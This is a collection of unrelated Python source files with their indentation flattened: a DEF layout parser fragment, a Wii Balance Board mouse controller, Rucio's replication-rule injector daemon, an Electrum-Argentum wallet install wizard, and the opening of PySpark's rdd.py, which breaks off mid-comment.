print('# Warning: Net {} does not contain any interconnect information!'.format(cur_net.name))
continue
# Use for SPEF writer, creating PATH from DEF
if buildPath:
build_path(cur_net, cell_coor_dict, pins)
nets.append(cur_net)
continue
if find_data:
parse_net(line, cur_net, cell_coor_dict)
""" END NETS """
# if buildPath:
# import multiprocessing as mp
# print('# Building Path ...')
# processes = []
# end = 0
#
# cpu_count = mp.cpu_count() + 10
# for i in range (cpu_count):
# start = end
#
# if i == cpu_count-1:
# end = len(nets)
# else:
# end = (i+1) * int(len(nets)/cpu_count)
#
# p = mp.Process(target=fork_build_path, args=(start, end, nets, cell_coor_dict, pins,))
# processes.append(p)
# p.start()
#
# for process in processes:
# process.join()
print('# Finished reading DEF')
# =============================================================================
# Desc: Build a dictionary of placement data (location, orientation, mapping number,
#       cell type, pin load caps and dimensions) for every parsed component
# Input: the list of Component objects plus the supporting LEF dictionaries
# =============================================================================
def create_block_dict(blocks, load_cap_dict, cell_dimension, cell_coor_dict):
for block in blocks:
cell_coor_dict[block.compName] = {'x' : block.x, 'y' : block.y, 'number' : block.number, 'cell_name' : block.type,
'pin' : load_cap_dict[block.type], 'orient' : block.orient, 'dimension' : cell_dimension[block.type]}
### Drop the local references to the helper dictionaries
del cell_dimension
del load_cap_dict
# =============================================================================
# Desc: Walk the tokenised PIN record and populate the Pin object's fields
# =============================================================================
def processPinData(pin_class, data):
# Walk the token list with a manual index so that the values consumed by a
# keyword are skipped instead of being re-examined on the next iteration.
i = 0
while i < len(data):
if re.search('NET', data[i]):
pin_class.set_net(data[i+1])
i += 2
continue
if re.search('DIRECTION', data[i]):
pin_class.set_direction(data[i+1])
i += 2
continue
if re.search('LAYER', data[i]):
add = 1
if data[i+2] == 'MASK' or data[i+2] == 'SPACING' or data[i+2] == 'DESIGNRULEWIDTH':
add = 3
pin_class.set_layer(data[i+1])
pin_class.set_dimension([data[i+add+1], data[i+add+2], data[i+add+3], data[i+add+4]])
i += (add + 5)
continue
if re.search('COVER|FIXED|PLACED', data[i]):
pin_class.set_x(data[i+1])
pin_class.set_y(data[i+2])
pin_class.set_orientation(data[i+3])
i += 4
continue
i += 1
def add_pin_info_toDict(pin_class, pin_dict):
pin_dict[pin_class.name] = {'NET' : pin_class.net, 'DIRECTION' : pin_class.direction, 'LAYER' : pin_class.layer,
'X' : pin_class.x, 'Y' : pin_class.y, 'dimension' : pin_class.dimension,
'orientation' : pin_class.orientation, 'number' : pin_class.number }
def processPropertyInfo(cur_net, data):
for i in range (1, len(data)-1, 2):
cur_net.set_property([data[i], data[i+1]])
def fork_build_path(start, end, nets, cell_coor_dict, pins,):
for i in range (start,end):
if nets[i].wire_list == []:
continue
build_path(nets[i], cell_coor_dict, pins)
|
mouse_control.py
|
import wiiboard
import pygame
import time
import pyautogui
import threading
pyautogui.FAILSAFE = False
THRESHOLD = 5
MOVEMENT_SCALE = 2
mouse_move_data = None
done = False
click = False
key_sim = None
def avg(x,y):
return (x+y)/2
def threshold(x):
return x**2 if abs(x) > THRESHOLD else 0
def move_mouse(tr,br,bl,tl):
tAvg = avg(tr, tl)
bAvg = avg(br, bl)
rAvg = avg(tr, br)
lAvg = avg(tl, bl)
mvVert = threshold(bAvg - tAvg) * MOVEMENT_SCALE
mvHorz = threshold(rAvg - lAvg) * MOVEMENT_SCALE
pyautogui.moveRel(mvHorz, mvVert, 1)
def mouse_control():
global mouse_move_data
global done
global click
while (not done):
if mouse_move_data is not None:
move_mouse(mouse_move_data.topRight,
mouse_move_data.bottomRight,
mouse_move_data.bottomLeft,
mouse_move_data.topLeft)
mouse_move_data = None
else:
time.sleep(0.01)  # avoid busy-waiting while no new balance-board data has arrived
def main():
global mouse_move_data
global done
board = wiiboard.Wiiboard()
pygame.init()
address = board.discover()
board.connect(address) #The wii board must be in sync mode at this time
time.sleep(0.1)
board.setLight(True)
# make the thread for mouse control
mouse_thread = threading.Thread(target=mouse_control)
mouse_thread.start()
while (not done):
time.sleep(0.05)
for event in pygame.event.get():
if event.type == wiiboard.WIIBOARD_CONNECTED:
print "The board is active. You know not what you have done."
elif event.type == wiiboard.WIIBOARD_DISCONNECTED:
print "You have disconnected the board."
elif event.type == wiiboard.WIIBOARD_MASS:
if (event.mass.totalWeight > 5): # 5 kg threshold, otherwise you would get a lot of useless small events!
if mouse_move_data is None:
print "updating mouse_move_data"
mouse_move_data = event.mass
#etc for topRight, bottomRight, bottomLeft. buttonPressed and buttonReleased also available but easier to use in separate event
elif event.type == wiiboard.WIIBOARD_BUTTON_PRESS:
print "Button pressed!"
elif event.type == wiiboard.WIIBOARD_BUTTON_RELEASE:
print "Button released"
done = True
#Other event types:
#wiiboard.WIIBOARD_CONNECTED
#wiiboard.WIIBOARD_DISCONNECTED
board.disconnect()
pygame.quit()
#Run the script if executed
if __name__ == "__main__":
main()
|
injector.py
|
# Copyright 2015-2018 CERN for the benefit of the ATLAS collaboration.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# - Martin Barisits <martin.barisits@cern.ch>, 2015-2017
# - Vincent Garonne <vgaronne@gmail.com>, 2018
"""
Judge-Injector is a daemon to asynchronously create replication rules
"""
import logging
import os
import socket
import sys
import threading
import time
import traceback
from copy import deepcopy
from datetime import datetime, timedelta
from re import match
from random import randint
from sqlalchemy.exc import DatabaseError
from rucio.common.config import config_get
from rucio.common.exception import (DatabaseException, RuleNotFound, RSEBlacklisted,
ReplicationRuleCreationTemporaryFailed, InsufficientAccountLimit)
from rucio.core.heartbeat import live, die, sanity_check
from rucio.core.rule import inject_rule, get_injected_rules, update_rule
from rucio.core.monitor import record_counter
graceful_stop = threading.Event()
logging.basicConfig(stream=sys.stdout,
level=getattr(logging,
config_get('common', 'loglevel',
raise_exception=False,
default='DEBUG').upper()),
format='%(asctime)s\t%(process)d\t%(levelname)s\t%(message)s')
def rule_injector(once=False):
"""
Main loop to check for asynchronous creation of replication rules
"""
hostname = socket.gethostname()
pid = os.getpid()
current_thread = threading.current_thread()
paused_rules = {} # {rule_id: datetime}
# Make an initial heartbeat so that all judge-injectors have the correct worker number on the next try
live(executable='rucio-judge-injector', hostname=hostname, pid=pid, thread=current_thread, older_than=2 * 60 * 60)
graceful_stop.wait(1)
while not graceful_stop.is_set():
try:
# heartbeat
heartbeat = live(executable='rucio-judge-injector', hostname=hostname, pid=pid, thread=current_thread, older_than=2 * 60 * 60)
start = time.time()
# Refresh paused rules
iter_paused_rules = deepcopy(paused_rules)
for key in iter_paused_rules:
if datetime.utcnow() > paused_rules[key]:
del paused_rules[key]
rules = get_injected_rules(total_workers=heartbeat['nr_threads'] - 1,
worker_number=heartbeat['assign_thread'],
limit=100,
blacklisted_rules=[key for key in paused_rules])
logging.debug('rule_injector[%s/%s] index query time %f fetch size is %d' % (heartbeat['assign_thread'], heartbeat['nr_threads'] - 1, time.time() - start, len(rules)))
if not rules and not once:
logging.debug('rule_injector[%s/%s] did not get any work (paused_rules=%s)' % (heartbeat['assign_thread'], heartbeat['nr_threads'] - 1, str(len(paused_rules))))
graceful_stop.wait(60)
else:
for rule in rules:
rule_id = rule[0]
logging.info('rule_injector[%s/%s]: Injecting rule %s' % (heartbeat['assign_thread'], heartbeat['nr_threads'] - 1, rule_id))
if graceful_stop.is_set():
break
try:
start = time.time()
inject_rule(rule_id=rule_id)
logging.debug('rule_injector[%s/%s]: injection of %s took %f' % (heartbeat['assign_thread'], heartbeat['nr_threads'] - 1, rule_id, time.time() - start))
except (DatabaseException, DatabaseError), e:
if match('.*ORA-00054.*', str(e.args[0])):
paused_rules[rule_id] = datetime.utcnow() + timedelta(seconds=randint(60, 600))
record_counter('rule.judge.exceptions.LocksDetected')
logging.warning('rule_injector[%s/%s]: Locks detected for %s' % (heartbeat['assign_thread'], heartbeat['nr_threads'] - 1, rule_id))
elif match('.*QueuePool.*', str(e.args[0])):
logging.warning(traceback.format_exc())
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
elif match('.*ORA-03135.*', str(e.args[0])):
logging.warning(traceback.format_exc())
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
else:
logging.error(traceback.format_exc())
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
except RSEBlacklisted, e:
paused_rules[rule_id] = datetime.utcnow() + timedelta(seconds=randint(60, 600))
logging.warning('rule_injector[%s/%s]: RSEBlacklisted for rule %s' % (heartbeat['assign_thread'], heartbeat['nr_threads'] - 1, rule_id))
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
except ReplicationRuleCreationTemporaryFailed, e:
paused_rules[rule_id] = datetime.utcnow() + timedelta(seconds=randint(60, 600))
logging.warning('rule_injector[%s/%s]: ReplicationRuleCreationTemporaryFailed for rule %s' % (heartbeat['assign_thread'], heartbeat['nr_threads'] - 1, rule_id))
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
except RuleNotFound, e:
pass
except InsufficientAccountLimit, e:
# A rule with InsufficientAccountLimit on injection hangs there potentially forever
# It should be marked as SUSPENDED
logging.info('rule_injector[%s/%s]: Marking rule %s as SUSPENDED due to InsufficientAccountLimit' % (heartbeat['assign_thread'], heartbeat['nr_threads'] - 1, rule_id))
update_rule(rule_id=rule_id, options={'state': 'SUSPENDED'})
except (DatabaseException, DatabaseError), e:
if match('.*QueuePool.*', str(e.args[0])):
logging.warning(traceback.format_exc())
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
elif match('.*ORA-03135.*', str(e.args[0])):
logging.warning(traceback.format_exc())
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
else:
logging.critical(traceback.format_exc())
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
except Exception, e:
logging.critical(traceback.format_exc())
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
if once:
break
die(executable='rucio-judge-injector', hostname=hostname, pid=pid, thread=current_thread)
def stop(signum=None, frame=None):
"""
Graceful exit.
"""
graceful_stop.set()
def run(once=False, threads=1):
"""
Starts up the Judge-Injector threads.
"""
hostname = socket.gethostname()
sanity_check(executable='rucio-judge-injector', hostname=hostname)
if once:
rule_injector(once)
else:
logging.info('Injector starting %s threads' % str(threads))
threads = [threading.Thread(target=rule_injector, kwargs={'once': once}) for i in xrange(0, threads)]
[t.start() for t in threads]
# Interruptible joins require a timeout.
while threads[0].is_alive():
[t.join(timeout=3.14) for t in threads]
|
installwizard.py
|
import sys
import os
import traceback  # used below by on_error() and the wallet-decryption error handler
from PyQt4.QtGui import *
from PyQt4.QtCore import *
import PyQt4.QtCore as QtCore
import electrum_arg as electrum
from electrum_arg import Wallet, WalletStorage
from electrum_arg.util import UserCancelled, InvalidPassword
from electrum_arg.base_wizard import BaseWizard
from electrum_arg.i18n import _
from seed_dialog import SeedLayout, KeysLayout
from network_dialog import NetworkChoiceLayout
from util import *
from password_dialog import PasswordLayout, PW_NEW
class GoBack(Exception):
pass
MSG_GENERATING_WAIT = _("Electrum is generating your addresses, please wait...")
MSG_ENTER_ANYTHING = _("Please enter a seed phrase, a master key, a list of "
"Argentum addresses, or a list of private keys")
MSG_ENTER_SEED_OR_MPK = _("Please enter a seed phrase or a master key (xpub or xprv):")
MSG_COSIGNER = _("Please enter the master public key of cosigner #%d:")
MSG_ENTER_PASSWORD = _("Choose a password to encrypt your wallet keys.") + '\n'\
+ _("Leave this field empty if you want to disable encryption.")
MSG_RESTORE_PASSPHRASE = \
_("Please enter your seed derivation passphrase. "
"Note: this is NOT your encryption password. "
"Leave this field empty if you did not use one or are unsure.")
class CosignWidget(QWidget):
size = 120
def __init__(self, m, n):
QWidget.__init__(self)
self.R = QRect(0, 0, self.size, self.size)
self.setGeometry(self.R)
self.setMinimumHeight(self.size)
self.setMaximumHeight(self.size)
self.m = m
self.n = n
def set_n(self, n):
self.n = n
self.update()
def set_m(self, m):
self.m = m
self.update()
def paintEvent(self, event):
import math
bgcolor = self.palette().color(QPalette.Background)
pen = QPen(bgcolor, 7, QtCore.Qt.SolidLine)
qp = QPainter()
qp.begin(self)
qp.setPen(pen)
qp.setRenderHint(QPainter.Antialiasing)
qp.setBrush(Qt.gray)
for i in range(self.n):
alpha = int(16* 360 * i/self.n)
alpha2 = int(16* 360 * 1/self.n)
qp.setBrush(Qt.green if i<self.m else Qt.gray)
qp.drawPie(self.R, alpha, alpha2)
qp.end()
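# Decorator used by the InstallWizard dialog methods below: it relabels the
# Back/Cancel button, swallows UserCancelled, maps GoBack onto wizard
# navigation, and forwards the dialog's return value(s) to the run_next
# callback passed in by the caller.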
def wizard_dialog(func):
def func_wrapper(*args, **kwargs):
run_next = kwargs['run_next']
wizard = args[0]
wizard.back_button.setText(_('Back') if wizard.can_go_back() else _('Cancel'))
try:
out = func(*args, **kwargs)
except GoBack:
wizard.go_back() if wizard.can_go_back() else wizard.close()
return
except UserCancelled:
return
#if out is None:
# out = ()
if type(out) is not tuple:
out = (out,)
apply(run_next, out)
return func_wrapper
# MessageBoxMixin must come before BaseWizard in the bases so that its show_error is the one picked up by the MRO
class InstallWizard(QDialog, MessageBoxMixin, BaseWizard):
def __init__(self, config, app, plugins, storage):
BaseWizard.__init__(self, config, storage)
QDialog.__init__(self, None)
self.setWindowTitle('Electrum - ' + _('Install Wizard'))
self.app = app
self.config = config
# Set for the base class
self.plugins = plugins
self.language_for_seed = config.get('language')
self.setMinimumSize(600, 400)
self.connect(self, QtCore.SIGNAL('accept'), self.accept)
self.title = QLabel()
self.main_widget = QWidget()
self.back_button = QPushButton(_("Back"), self)
self.next_button = QPushButton(_("Next"), self)
self.next_button.setDefault(True)
self.logo = QLabel()
self.please_wait = QLabel(_("Please wait..."))
self.please_wait.setAlignment(Qt.AlignCenter)
self.icon_filename = None
self.loop = QEventLoop()
self.rejected.connect(lambda: self.loop.exit(0))
self.back_button.clicked.connect(lambda: self.loop.exit(1))
self.next_button.clicked.connect(lambda: self.loop.exit(2))
outer_vbox = QVBoxLayout(self)
inner_vbox = QVBoxLayout()
inner_vbox.addWidget(self.title)
inner_vbox.addWidget(self.main_widget)
inner_vbox.addStretch(1)
inner_vbox.addWidget(self.please_wait)
inner_vbox.addStretch(1)
icon_vbox = QVBoxLayout()
icon_vbox.addWidget(self.logo)
icon_vbox.addStretch(1)
hbox = QHBoxLayout()
hbox.addLayout(icon_vbox)
hbox.addSpacing(5)
hbox.addLayout(inner_vbox)
hbox.setStretchFactor(inner_vbox, 1)
outer_vbox.addLayout(hbox)
outer_vbox.addLayout(Buttons(self.back_button, self.next_button))
self.set_icon(':icons/electrum-arg.png')
self.show()
self.raise_()
self.refresh_gui()  # Needed for Qt on MacOSX. Lame.
def run_and_get_wallet(self):
def on_filename():
wallet_folder = os.path.dirname(self.storage.path)
path = unicode(QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder))
if path:
self.name_e.setText(path)
self.storage = WalletStorage(path)
update_layout()
def update_layout():
name = os.path.basename(self.storage.path)
vbox = QVBoxLayout()
hbox = QHBoxLayout()
hbox.addWidget(QLabel(_('Wallet') + ':'))
self.name_e = QLineEdit(text=name)
hbox.addWidget(self.name_e)
button = QPushButton(_('Choose...'))
button.clicked.connect(on_filename)
hbox.addWidget(button)
vbox.addLayout(hbox)
self.pw_e = None
if not self.storage.file_exists():
msg = _("This file does not exist.") + '\n' \
+ _("Press 'Next' to create this wallet, or chose another file.")
vbox.addWidget(QLabel(msg))
elif self.storage.file_exists() and self.storage.is_encrypted():
msg = _("This file is encrypted.") + '\n' + _('Enter your password or choose another file.')
vbox.addWidget(QLabel(msg))
hbox2 = QHBoxLayout()
self.pw_e = QLineEdit('', self)
self.pw_e.setFixedWidth(150)
self.pw_e.setEchoMode(2)
hbox2.addWidget(QLabel(_('Password') + ':'))
hbox2.addWidget(self.pw_e)
hbox2.addStretch()
vbox.addLayout(hbox2)
else:
msg = _("Press 'Next' to open this wallet.")
vbox.addWidget(QLabel(msg))
self.set_layout(vbox, title=_('Electrum wallet'))
if self.pw_e:
self.pw_e.show()
self.pw_e.setFocus()
while True:
update_layout()
if self.storage.file_exists() and not self.storage.is_encrypted():
break
if not self.loop.exec_():
return
if not self.storage.file_exists():
break
if self.storage.file_exists() and self.storage.is_encrypted():
password = unicode(self.pw_e.text())
try:
self.storage.decrypt(password)
break
except InvalidPassword as e:
QMessageBox.information(None, _('Error'), str(e), _('OK'))
continue
except BaseException as e:
traceback.print_exc(file=sys.stdout)
QMessageBox.information(None, _('Error'), str(e), _('OK'))
return
path = self.storage.path
if self.storage.requires_split():
self.hide()
msg = _("The wallet '%s' contains multiple accounts, which are no longer supported in Electrum 2.7.\n\n"
"Do you want to split your wallet into multiple files?"%path)
if not self.question(msg):
return
file_list = '\n'.join(self.storage.split_accounts())
msg = _('Your accounts have been moved to') + ':\n' + file_list + '\n\n'+ _('Do you want to delete the old file') + ':\n' + path
if self.question(msg):
os.remove(path)
self.show_warning(_('The file was removed'))
return
if self.storage.requires_upgrade():
self.hide()
msg = _("The format of your wallet '%s' must be upgraded for Electrum. This change will not be backward compatible"%path)
if not self.question(msg):
return
self.storage.upgrade()
self.show_warning(_('Your wallet was upgraded successfully'))
self.wallet = Wallet(self.storage)
self.terminate()
return self.wallet
action = self.storage.get_action()
if action and action != 'new':
self.hide()
msg = _("The file '%s' contains an incompletely created wallet.\n"
"Do you want to complete its creation now?") % path
if not self.question(msg):
if self.question(_("Do you want to delete '%s'?") % path):
os.remove(path)
self.show_warning(_('The file was removed'))
return
self.show()
if action:
# self.wallet is set in run
self.run(action)
return self.wallet
self.wallet = Wallet(self.storage)
self.terminate()
return self.wallet
def finished(self):
"""Called in hardware client wrapper, in order to close popups."""
return
def on_error(self, exc_info):
if not isinstance(exc_info[1], UserCancelled):
traceback.print_exception(*exc_info)
self.show_error(str(exc_info[1]))
def set_icon(self, filename):
prior_filename, self.icon_filename = self.icon_filename, filename
self.logo.setPixmap(QPixmap(filename).scaledToWidth(60))
return prior_filename
def set_layout(self, layout, title=None, next_enabled=True):
self.title.setText("<b>%s</b>"%title if title else "")
self.title.setVisible(bool(title))
# Get rid of any prior layout by assigning it to a temporary widget
prior_layout = self.main_widget.layout()
if prior_layout:
QWidget().setLayout(prior_layout)
self.main_widget.setLayout(layout)
self.back_button.setEnabled(True)
self.next_button.setEnabled(next_enabled)
if next_enabled:
self.next_button.setFocus()
self.main_widget.setVisible(True)
self.please_wait.setVisible(False)
def exec_layout(self, layout, title=None, raise_on_cancel=True,
next_enabled=True):
self.set_layout(layout, title, next_enabled)
result = self.loop.exec_()
if not result and raise_on_cancel:
raise UserCancelled
if result == 1:
raise GoBack
self.title.setVisible(False)
self.back_button.setEnabled(False)
self.next_button.setEnabled(False)
self.main_widget.setVisible(False)
self.please_wait.setVisible(True)
self.refresh_gui()
return result
def refresh_gui(self):
# For some reason, to refresh the GUI this needs to be called twice
self.app.processEvents()
self.app.processEvents()
def remove_from_recently_open(self, filename):
self.config.remove_from_recently_open(filename)
def text_input(self, title, message, is_valid):
slayout = KeysLayout(parent=self, title=message, is_valid=is_valid)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_text()
def seed_input(self, title, message, is_seed, options):
slayout = SeedLayout(title=message, is_seed=is_seed, options=options, parent=self)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_seed(), slayout.is_bip39, slayout.is_ext
@wizard_dialog
def add_xpub_dialog(self, title, message, is_valid, run_next):
return self.text_input(title, message, is_valid)
@wizard_dialog
def add_cosigner_dialog(self, run_next, index, is_valid):
title = _("Add Cosigner") + " %d"%index
message = ' '.join([
_('Please enter the master public key (xpub) of your cosigner.'),
_('Enter their master private key (xprv) if you want to be able to sign for them.')
])
return self.text_input(title, message, is_valid)
@wizard_dialog
def restore_seed_dialog(self, run_next, test):
options = []
if self.opt_ext:
options.append('ext')
if self.opt_bip39:
options.append('bip39')
title = _('Enter Seed')
message = _('Please enter your seed phrase in order to restore your wallet.')
return self.seed_input(title, message, test, options)
@wizard_dialog
def confirm_seed_dialog(self, run_next, test):
self.app.clipboard().clear()
title = _('Confirm Seed')
message = ' '.join([
_('Your seed is important!'),
_('If you lose your seed, your money will be permanently lost.'),
_('To make sure that you have properly saved your seed, please retype it here.')
])
seed, is_bip39, is_ext = self.seed_input(title, message, test, None)
return seed
@wizard_dialog
def show_seed_dialog(self, run_next, seed_text):
title = _("Your wallet generation seed is:")
slayout = SeedLayout(seed=seed_text, title=title, msg=True, options=['ext'])
self.exec_layout(slayout)
return slayout.is_ext
def pw_layout(self, msg, kind):
playout = PasswordLayout(None, msg, kind, self.next_button)
playout.encrypt_cb.setChecked(True)
self.exec_layout(playout.layout())
return playout.new_password(), playout.encrypt_cb.isChecked()
@wizard_dialog
def request_password(self, run_next):
"""Request the user enter a new password and confirm it. Return
the password or None for no password."""
return self.pw_layout(MSG_ENTER_PASSWORD, PW_NEW)
def show_restore(self, wallet, network):
# FIXME: these messages are shown after the install wizard is
# finished and the window closed. On MacOSX they appear parented
# with a re-appeared ghost install wizard window...
if network:
def task():
wallet.wait_until_synchronized()
if wallet.is_found():
msg = _("Recovery successful")
else:
msg = _("No transactions found for this seed")
self.emit(QtCore.SIGNAL('synchronized'), msg)
self.connect(self, QtCore.SIGNAL('synchronized'), self.show_message)
t = threading.Thread(target = task)
t.daemon = True
t.start()
else:
msg = _("This wallet was restored offline. It may "
"contain more addresses than displayed.")
self.show_message(msg)
@wizard_dialog
def confirm_dialog(self, title, message, run_next):
self.confirm(message, title)
def confirm(self, message, title):
vbox = QVBoxLayout()
vbox.addWidget(WWLabel(message))
self.exec_layout(vbox, title)
@wizard_dialog
def action_dialog(self, action, run_next):
self.run(action)
def terminate(self):
self.emit(QtCore.SIGNAL('accept'))
def waiting_dialog(self, task, msg):
self.please_wait.setText(MSG_GENERATING_WAIT)
self.refresh_gui()
t = threading.Thread(target = task)
t.start()
t.join()
@wizard_dialog
def choice_dialog(self, title, message, choices, run_next):
        c_values = [x[0] for x in choices]
        c_titles = [x[1] for x in choices]
clayout = ChoicesLayout(message, c_titles)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, title)
action = c_values[clayout.selected_index()]
return action
def query_choice(self, msg, choices):
"""called by hardware wallets"""
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, '')
return clayout.selected_index()
@wizard_dialog
def line_dialog(self, run_next, title, message, default, test, warning=''):
vbox = QVBoxLayout()
vbox.addWidget(WWLabel(message))
line = QLineEdit()
line.setText(default)
def f(text):
self.next_button.setEnabled(test(text))
line.textEdited.connect(f)
vbox.addWidget(line)
vbox.addWidget(WWLabel(warning))
self.exec_layout(vbox, title, next_enabled=test(default))
return ' '.join(unicode(line.text()).split())
@wizard_dialog
def show_xpub_dialog(self, xpub, run_next):
msg = ' '.join([
_("Here is your master public key."),
_("Please share it with your cosigners.")
])
vbox = QVBoxLayout()
layout = SeedLayout(xpub, title=msg, icon=False)
vbox.addLayout(layout.layout())
self.exec_layout(vbox, _('Master Public Key'))
return None
def init_network(self, network):
message = _("Electrum communicates with remote servers to get "
"information about your transactions and addresses. The "
"servers all fulfil the same purpose only differing in "
"hardware. In most cases you simply want to let Electrum "
"pick one at random. However if you prefer feel free to "
"select a server manually.")
choices = [_("Auto connect"), _("Select server manually")]
title = _("How do you want to connect to a server? ")
clayout = ChoicesLayout(message, choices)
self.back_button.setText(_('Cancel'))
self.exec_layout(clayout.layout(), title)
r = clayout.selected_index()
if r == 1:
nlayout = NetworkChoiceLayout(network, self.config, wizard=True)
if self.exec_layout(nlayout.layout()):
nlayout.accept()
else:
network.auto_connect = True
self.config.set_key('auto_connect', True, True)
@wizard_dialog
def multisig_dialog(self, run_next):
cw = CosignWidget(2, 2)
m_edit = QSlider(Qt.Horizontal, self)
n_edit = QSlider(Qt.Horizontal, self)
n_edit.setMinimum(2)
n_edit.setMaximum(15)
m_edit.setMinimum(1)
m_edit.setMaximum(2)
n_edit.setValue(2)
m_edit.setValue(2)
n_label = QLabel()
m_label = QLabel()
grid = QGridLayout()
grid.addWidget(n_label, 0, 0)
grid.addWidget(n_edit, 0, 1)
grid.addWidget(m_label, 1, 0)
grid.addWidget(m_edit, 1, 1)
def on_m(m):
m_label.setText(_('Require %d signatures')%m)
cw.set_m(m)
def on_n(n):
n_label.setText(_('From %d cosigners')%n)
cw.set_n(n)
m_edit.setMaximum(n)
n_edit.valueChanged.connect(on_n)
m_edit.valueChanged.connect(on_m)
on_n(2)
on_m(2)
vbox = QVBoxLayout()
vbox.addWidget(cw)
vbox.addWidget(WWLabel(_("Choose the number of signatures needed to unlock funds in your wallet:")))
vbox.addLayout(grid)
self.exec_layout(vbox, _("Multi-Signature Wallet"))
m = int(m_edit.value())
n = int(n_edit.value())
return (m, n)
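    # Illustrative note (not part of the original Electrum source): the two
    # sliders are coupled so that m can never exceed n, because on_n() lowers
    # m_edit's maximum whenever n changes. A hedged sketch of the same
    # invariant, using only the (m, n) pair this dialog returns:
    #
    #     def clamp_multisig(m, n):
    #         n = max(2, min(n, 15))   # cosigners limited to 2..15 by the sliders
    #         m = max(1, min(m, n))    # required signatures cannot exceed n
    #         return m, n
    #
    #     clamp_multisig(5, 3)  # -> (3, 3)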
|
rdd.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import copy
import sys
import os
import re
import operator
import shlex
import warnings
import heapq
import bisect
import random
import socket
from subprocess import Popen, PIPE
from tempfile import NamedTemporaryFile
from threading import Thread
from collections import defaultdict
from itertools import chain
from functools import reduce
from math import sqrt, log, isinf, isnan, pow, ceil
if sys.version > '3':
basestring = unicode = str
else:
from itertools import imap as map, ifilter as filter
from pyspark.serializers import NoOpSerializer, CartesianDeserializer, \
BatchedSerializer, CloudPickleSerializer, PairDeserializer, \
PickleSerializer, pack_long, AutoBatchedSerializer
from pyspark.join import python_join, python_left_outer_join, \
python_right_outer_join, python_full_outer_join, python_cogroup
from pyspark.statcounter import StatCounter
from pyspark.rddsampler import RDDSampler, RDDRangeSampler, RDDStratifiedSampler
from pyspark.storagelevel import StorageLevel
from pyspark.resultiterable import ResultIterable
from pyspark.shuffle import Aggregator, ExternalMerger, \
get_used_memory, ExternalSorter, ExternalGroupBy
from pyspark.traceback_utils import SCCallSiteSync
__all__ = ["RDD"]
def portable_hash(x):
"""
    This function returns a consistent hash code for builtin types, especially
    for None and for tuples containing None.
    The algorithm is similar to the one used by CPython 2.7.
>>> portable_hash(None)
0
>>> portable_hash((None, 1)) & 0xffffffff
219750521
"""
if sys.version >= '3.3' and 'PYTHONHASHSEED' not in os.environ:
raise Exception("Randomness of hash of string should be disabled via PYTHONHASHSEED")
if x is None:
return 0
if isinstance(x, tuple):
h = 0x345678
for i in x:
h ^= portable_hash(i)
h *= 1000003
h &= sys.maxsize
h ^= len(x)
if h == -1:
h = -2
return int(h)
return hash(x)
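# Illustrative note (not part of the original source): portable_hash exists so
# that keys hash identically in every Python worker process. The builtin
# hash() of None (and, under hash randomization, of strings) can differ
# between processes, which would scatter equal keys across partitions.
# A hedged sketch of how a partitioner might rely on it:
#
#     bucket = portable_hash(("user", None)) % 8   # same bucket on every worker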
class BoundedFloat(float):
"""
    A bounded value produced by an approximate job, carrying a confidence
    level together with low and high bounds.
>>> BoundedFloat(100.0, 0.95, 95.0, 105.0)
100.0
"""
def __new__(cls, mean, confidence, low, high):
obj = float.__new__(cls, mean)
obj.confidence = confidence
obj.low = low
obj.high = high
return obj
def _parse_memory(s):
"""
Parse a memory string in the format supported by Java (e.g. 1g, 200m) and
return the value in MB
>>> _parse_memory("256m")
256
>>> _parse_memory("2g")
2048
"""
units = {'g': 1024, 'm': 1, 't': 1 << 20, 'k': 1.0 / 1024}
if s[-1].lower() not in units:
raise ValueError("invalid format: " + s)
return int(float(s[:-1]) * units[s[-1].lower()])
def _load_from_socket(port, serializer):
sock = None
# Support for both IPv4 and IPv6.
    # On most IPv6-ready systems, IPv6 will take precedence.
for res in socket.getaddrinfo("localhost", port, socket.AF_UNSPEC, socket.SOCK_STREAM):
af, socktype, proto, canonname, sa = res
sock = socket.socket(af, socktype, proto)
try:
sock.settimeout(15)
sock.connect(sa)
except socket.error:
sock.close()
sock = None
continue
break
if not sock:
raise Exception("could not open socket")
    # The time to materialize the RDD is unpredictable, so if we set a timeout on the socket
    # read operation it is very likely to fail. See SPARK-18281.
sock.settimeout(None)
# The socket will be automatically closed when garbage-collected.
return serializer.load_stream(sock.makefile("rb", 65536))
def ignore_unicode_prefix(f):
"""
    Ignore the 'u' prefix of strings in doctests, so that they work
    in both Python 2 and Python 3.
"""
if sys.version >= '3':
        # the representation of a unicode string in Python 3 does not have the prefix 'u',
        # so remove the prefix 'u' from the doctests
literal_re = re.compile(r"(\W|^)[uU](['])", re.UNICODE)
f.__doc__ = literal_re.sub(r'\1\2', f.__doc__)
return f
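# Illustrative example (an assumption, not from the original source): the regex
# above strips a Python 2 style 'u' prefix from expected doctest output, e.g.:
#
#     import re
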